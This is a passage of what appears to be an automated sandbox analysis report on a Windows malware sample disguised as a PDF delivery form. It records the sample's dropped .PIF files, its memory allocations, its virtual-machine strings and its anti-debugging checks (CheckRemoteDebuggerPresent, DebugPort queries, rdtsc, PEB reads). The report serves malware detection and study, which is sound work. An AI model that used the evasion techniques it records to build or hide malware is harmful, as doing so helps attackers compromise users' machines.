                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2D16000 memory commit 500006912Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2D18000 memory commit 500015104Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeMemory allocated: 2CD0000 memory commit 500006912Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeMemory allocated: 2CD1000 memory commit 500178944Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeMemory allocated: 2CFC000 memory commit 500002816Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeMemory allocated: 2CFD000 memory commit 500199424Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeMemory allocated: 2D2E000 memory commit 501014528Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeMemory allocated: 2E26000 memory commit 500006912Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeMemory allocated: 2E28000 memory commit 500015104Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2CB0000 memory commit 500006912Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2CB1000 memory commit 500178944Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2CDC000 memory commit 500002816Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2CDD000 memory commit 500199424Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2D0E000 memory commit 501014528Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2E06000 memory commit 500006912Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: 2E08000 memory commit 500015104Jump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB096E rdtsc 5_2_22AB096E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifAPI coverage: 0.7 %
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifAPI coverage: 0.3 %
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pif TID: 2644Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pif TID: 4620Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pif TID: 3424Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CD58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02CD58B4
                      Source: Cpbxcxnx.PIF, 0000000D.00000002.2467965388.000000000086E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.0000000000843000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.00000000007FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                      Source: Cpbxcxnx.PIF, 00000009.00000002.2355700970.000000000087E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-25521
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CEEBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02CEEBF0
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB096E rdtsc 5_2_22AB096E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_00417B33 LdrLoadDll,5_2_00417B33
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE87A0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02CE87A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B062A0 mov eax, dword ptr fs:[00000030h]5_2_22B062A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B062A0 mov ecx, dword ptr fs:[00000030h]5_2_22B062A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B062A0 mov eax, dword ptr fs:[00000030h]5_2_22B062A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B062A0 mov eax, dword ptr fs:[00000030h]5_2_22B062A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B062A0 mov eax, dword ptr fs:[00000030h]5_2_22B062A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B062A0 mov eax, dword ptr fs:[00000030h]5_2_22B062A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF0283 mov eax, dword ptr fs:[00000030h]5_2_22AF0283
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF0283 mov eax, dword ptr fs:[00000030h]5_2_22AF0283
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF0283 mov eax, dword ptr fs:[00000030h]5_2_22AF0283
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE284 mov eax, dword ptr fs:[00000030h]5_2_22AAE284
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE284 mov eax, dword ptr fs:[00000030h]5_2_22AAE284
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A802E1 mov eax, dword ptr fs:[00000030h]5_2_22A802E1
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A802E1 mov eax, dword ptr fs:[00000030h]5_2_22A802E1
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A802E1 mov eax, dword ptr fs:[00000030h]5_2_22A802E1
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A2C3 mov eax, dword ptr fs:[00000030h]5_2_22A7A2C3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A2C3 mov eax, dword ptr fs:[00000030h]5_2_22A7A2C3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A2C3 mov eax, dword ptr fs:[00000030h]5_2_22A7A2C3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A2C3 mov eax, dword ptr fs:[00000030h]5_2_22A7A2C3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A2C3 mov eax, dword ptr fs:[00000030h]5_2_22A7A2C3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6823B mov eax, dword ptr fs:[00000030h]5_2_22A6823B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]5_2_22B20274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]5_2_22B20274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]5_2_22B20274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]5_2_22B20274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]5_2_22B20274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]5_2_22B20274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]5_2_22B20274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]5_2_22B20274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]5_2_22B20274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]5_2_22B20274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]5_2_22B20274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B20274 mov eax, dword ptr fs:[00000030h]5_2_22B20274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A74260 mov eax, dword ptr fs:[00000030h]5_2_22A74260
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A74260 mov eax, dword ptr fs:[00000030h]5_2_22A74260
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A74260 mov eax, dword ptr fs:[00000030h]5_2_22A74260
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6826B mov eax, dword ptr fs:[00000030h]5_2_22A6826B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B2A250 mov eax, dword ptr fs:[00000030h]5_2_22B2A250
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B2A250 mov eax, dword ptr fs:[00000030h]5_2_22B2A250
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF8243 mov eax, dword ptr fs:[00000030h]5_2_22AF8243
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF8243 mov ecx, dword ptr fs:[00000030h]5_2_22AF8243
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6A250 mov eax, dword ptr fs:[00000030h]5_2_22A6A250
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A76259 mov eax, dword ptr fs:[00000030h]5_2_22A76259
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9438F mov eax, dword ptr fs:[00000030h]5_2_22A9438F
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9438F mov eax, dword ptr fs:[00000030h]5_2_22A9438F
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6E388 mov eax, dword ptr fs:[00000030h]5_2_22A6E388
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6E388 mov eax, dword ptr fs:[00000030h]5_2_22A6E388
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6E388 mov eax, dword ptr fs:[00000030h]5_2_22A6E388
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A68397 mov eax, dword ptr fs:[00000030h]5_2_22A68397
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A68397 mov eax, dword ptr fs:[00000030h]5_2_22A68397
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A68397 mov eax, dword ptr fs:[00000030h]5_2_22A68397
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]5_2_22A803E9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]5_2_22A803E9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]5_2_22A803E9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]5_2_22A803E9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]5_2_22A803E9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]5_2_22A803E9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]5_2_22A803E9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A803E9 mov eax, dword ptr fs:[00000030h]5_2_22A803E9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA63FF mov eax, dword ptr fs:[00000030h]5_2_22AA63FF
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8E3F0 mov eax, dword ptr fs:[00000030h]5_2_22A8E3F0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8E3F0 mov eax, dword ptr fs:[00000030h]5_2_22A8E3F0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8E3F0 mov eax, dword ptr fs:[00000030h]5_2_22A8E3F0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B143D4 mov eax, dword ptr fs:[00000030h]5_2_22B143D4
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B143D4 mov eax, dword ptr fs:[00000030h]5_2_22B143D4
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A3C0 mov eax, dword ptr fs:[00000030h]5_2_22A7A3C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A3C0 mov eax, dword ptr fs:[00000030h]5_2_22A7A3C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A3C0 mov eax, dword ptr fs:[00000030h]5_2_22A7A3C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A3C0 mov eax, dword ptr fs:[00000030h]5_2_22A7A3C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A3C0 mov eax, dword ptr fs:[00000030h]5_2_22A7A3C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A3C0 mov eax, dword ptr fs:[00000030h]5_2_22A7A3C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A783C0 mov eax, dword ptr fs:[00000030h]5_2_22A783C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A783C0 mov eax, dword ptr fs:[00000030h]5_2_22A783C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A783C0 mov eax, dword ptr fs:[00000030h]5_2_22A783C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A783C0 mov eax, dword ptr fs:[00000030h]5_2_22A783C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E3DB mov eax, dword ptr fs:[00000030h]5_2_22B1E3DB
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E3DB mov eax, dword ptr fs:[00000030h]5_2_22B1E3DB
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E3DB mov ecx, dword ptr fs:[00000030h]5_2_22B1E3DB
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1E3DB mov eax, dword ptr fs:[00000030h]5_2_22B1E3DB
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF63C0 mov eax, dword ptr fs:[00000030h]5_2_22AF63C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B2C3CD mov eax, dword ptr fs:[00000030h]5_2_22B2C3CD
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAA30B mov eax, dword ptr fs:[00000030h]5_2_22AAA30B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAA30B mov eax, dword ptr fs:[00000030h]5_2_22AAA30B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAA30B mov eax, dword ptr fs:[00000030h]5_2_22AAA30B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6C310 mov ecx, dword ptr fs:[00000030h]5_2_22A6C310
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A90310 mov ecx, dword ptr fs:[00000030h]5_2_22A90310
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1437C mov eax, dword ptr fs:[00000030h]5_2_22B1437C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3A352 mov eax, dword ptr fs:[00000030h]5_2_22B3A352
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B18350 mov ecx, dword ptr fs:[00000030h]5_2_22B18350
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF2349 mov eax, dword ptr fs:[00000030h]5_2_22AF2349
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF035C mov eax, dword ptr fs:[00000030h]5_2_22AF035C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF035C mov eax, dword ptr fs:[00000030h]5_2_22AF035C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF035C mov eax, dword ptr fs:[00000030h]5_2_22AF035C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF035C mov ecx, dword ptr fs:[00000030h]5_2_22AF035C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF035C mov eax, dword ptr fs:[00000030h]5_2_22AF035C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF035C mov eax, dword ptr fs:[00000030h]5_2_22AF035C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B360B8 mov eax, dword ptr fs:[00000030h]5_2_22B360B8
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B360B8 mov ecx, dword ptr fs:[00000030h]5_2_22B360B8
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B080A8 mov eax, dword ptr fs:[00000030h]5_2_22B080A8
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7208A mov eax, dword ptr fs:[00000030h]5_2_22A7208A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6A0E3 mov ecx, dword ptr fs:[00000030h]5_2_22A6A0E3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A780E9 mov eax, dword ptr fs:[00000030h]5_2_22A780E9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF60E0 mov eax, dword ptr fs:[00000030h]5_2_22AF60E0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6C0F0 mov eax, dword ptr fs:[00000030h]5_2_22A6C0F0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB20F0 mov ecx, dword ptr fs:[00000030h]5_2_22AB20F0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF20DE mov eax, dword ptr fs:[00000030h]5_2_22AF20DE
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B06030 mov eax, dword ptr fs:[00000030h]5_2_22B06030
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6A020 mov eax, dword ptr fs:[00000030h]5_2_22A6A020
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6C020 mov eax, dword ptr fs:[00000030h]5_2_22A6C020
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF4000 mov ecx, dword ptr fs:[00000030h]5_2_22AF4000
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]5_2_22B12000
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]5_2_22B12000
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]5_2_22B12000
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]5_2_22B12000
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]5_2_22B12000
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]5_2_22B12000
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]5_2_22B12000
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B12000 mov eax, dword ptr fs:[00000030h]5_2_22B12000
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8E016 mov eax, dword ptr fs:[00000030h]5_2_22A8E016
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8E016 mov eax, dword ptr fs:[00000030h]5_2_22A8E016
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8E016 mov eax, dword ptr fs:[00000030h]5_2_22A8E016
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8E016 mov eax, dword ptr fs:[00000030h]5_2_22A8E016
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9C073 mov eax, dword ptr fs:[00000030h]5_2_22A9C073
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A72050 mov eax, dword ptr fs:[00000030h]5_2_22A72050
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF6050 mov eax, dword ptr fs:[00000030h]5_2_22AF6050
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB0185 mov eax, dword ptr fs:[00000030h]5_2_22AB0185
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF019F mov eax, dword ptr fs:[00000030h]5_2_22AF019F
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF019F mov eax, dword ptr fs:[00000030h]5_2_22AF019F
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF019F mov eax, dword ptr fs:[00000030h]5_2_22AF019F
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF019F mov eax, dword ptr fs:[00000030h]5_2_22AF019F
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6A197 mov eax, dword ptr fs:[00000030h]5_2_22A6A197
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6A197 mov eax, dword ptr fs:[00000030h]5_2_22A6A197
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6A197 mov eax, dword ptr fs:[00000030h]5_2_22A6A197
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B14180 mov eax, dword ptr fs:[00000030h]5_2_22B14180
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B14180 mov eax, dword ptr fs:[00000030h]5_2_22B14180
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B2C188 mov eax, dword ptr fs:[00000030h]5_2_22B2C188
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B2C188 mov eax, dword ptr fs:[00000030h]5_2_22B2C188
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B461E5 mov eax, dword ptr fs:[00000030h]5_2_22B461E5
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA01F8 mov eax, dword ptr fs:[00000030h]5_2_22AA01F8
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B361C3 mov eax, dword ptr fs:[00000030h]5_2_22B361C3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B361C3 mov eax, dword ptr fs:[00000030h]5_2_22B361C3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEE1D0 mov eax, dword ptr fs:[00000030h]5_2_22AEE1D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEE1D0 mov eax, dword ptr fs:[00000030h]5_2_22AEE1D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEE1D0 mov ecx, dword ptr fs:[00000030h]5_2_22AEE1D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEE1D0 mov eax, dword ptr fs:[00000030h]5_2_22AEE1D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEE1D0 mov eax, dword ptr fs:[00000030h]5_2_22AEE1D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA0124 mov eax, dword ptr fs:[00000030h]5_2_22AA0124
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B30115 mov eax, dword ptr fs:[00000030h]5_2_22B30115
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1A118 mov ecx, dword ptr fs:[00000030h]5_2_22B1A118
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1A118 mov eax, dword ptr fs:[00000030h]5_2_22B1A118
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1A118 mov eax, dword ptr fs:[00000030h]5_2_22B1A118
